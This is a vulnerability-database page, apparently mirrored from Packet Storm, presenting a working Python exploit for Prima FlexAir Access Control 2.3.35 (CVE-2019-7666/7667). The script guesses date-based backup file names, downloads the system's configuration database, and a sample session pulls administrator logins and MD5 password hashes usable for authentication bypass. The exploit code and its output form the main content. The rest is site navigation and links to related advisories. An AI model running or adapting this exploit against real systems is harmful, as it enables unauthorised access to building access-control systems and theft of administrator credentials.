Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name

🗓️ 12 Nov 2019 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 133 Views

Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit, Authentication Bypass, CVE-2019-7666, CVE-2019-766

Related
Code
ReporterTitlePublishedViews
Family
0day.today		FlexAir Access Control 2.3.35 - Authentication Bypass Exploit
12 Nov 201900:00
zdt
CNVD		Prima FlexAir MD5 Hash Authentication Vulnerability
2 Jul 201900:00
cnvd
CNVD		Prima FlexAir Database Configuration Backup Download Vulnerability
2 Jul 201900:00
cnvd
Check Point Advisories		Prima Systems FlexAir Authentication Bypass (CVE-2019-7667)
15 Jan 202000:00
checkpoint_advisories
CVE		CVE-2019-7666
1 Jul 201918:27
cve
CVE		CVE-2019-7667
1 Jul 201918:22
cve
Cvelist		CVE-2019-7666
1 Jul 201918:27
cvelist
Cvelist		CVE-2019-7667
1 Jul 201918:22
cvelist
Exploit DB		FlexAir Access Control 2.3.35 - Authentication Bypass
12 Nov 201900:00
exploitdb
EUVD		EUVD-2019-17199
7 Oct 202500:30
euvd
Rows per page
`#!/usr/bin/env python  
# -*- coding: utf8 -*-  
#  
# Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit  
# Authentication Bypass (Login with MD5 hash)  
#  
# CVE: CVE-2019-7666, CVE-2019-7667  
# Advisory: https://applied-risk.com/resources/ar-2019-007  
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system  
#  
# Discovered by Gjoko 'LiquidWorm' Krstic  
#  
# Older versions: /links/Nova_Config_2019-01-03.bck  
# Older versions: /Nova/assets/Nova_Config_2019-01-03.bck  
# Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3  
# Fixed versions: 2.4  
#  
###################################################################################  
#  
# lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080  
# [+] Please wait while fetchin the backup config file...  
# [+] Found some juice!  
# [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck  
# [+] Saved as: Nova_Config_2019-01-07.bck-105625.db  
# lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db   
# SQLite version 3.22.0 2018-01-22 18:45:57  
# Enter ".help" for usage hints.  
# sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2);  
# superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065  
# sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe  
# sqlite> .q  
# lqwrm@metalgear:~/stuff/prima$   
#  
###################################################################################  
#  
# 11.01.2019  
#  
  
import os#######  
import sys######  
import time#####  
import requests#  
  
from datetime import timedelta, date  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
  
piton = os.path.basename(sys.argv[0])  
  
if len(sys.argv) < 2:  
print '[+] Usage: '+piton+' [target]'  
print '[+] Target example 1: http://10.0.0.17:8080'  
print '[+] Target example 2: https://primanova.tld\n'  
sys.exit()  
  
host = sys.argv[1]  
  
def datum(start_date, end_date):  
for n in range(int ((end_date - start_date).days)):  
yield start_date + timedelta(n)  
  
start_date = date(2017, 1, 1)  
end_date = date(2019, 12, 30)  
  
print '[+] Please wait while fetchin the backup config file...'  
  
def spinning_cursor():  
while True:  
for cursor in '|/-\\':  
yield cursor  
  
spinner = spinning_cursor()  
  
for mooshoo in datum(start_date, end_date):  
sys.stdout.write(next(spinner))  
sys.stdout.flush()  
time.sleep(0.1)  
sys.stdout.write('\b')  
h = requests.get(host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck', verify=False)  
  
if (h.status_code) == 200:  
print '[+] Found some juice!'  
print '[+] Downloading: '+host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck'  
timestr = time.strftime('%H%M%S')  
time.sleep(1)  
open('Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db', 'wb').write(h.content)  
print '[+] Saved as: Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db'  
sys.exit()  
  
print '[-] No backup for you today. :('  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Nov 2019 00:00Current
9.3High risk
Vulners AI Score9.3
EPSS0.19262
prima flexairdatabase backuppredictable nameauthentication bypassmd5 hashcve-2019-7666cve-2019-7667advisoryapplied riskgjoko krsticnova configexploit.
133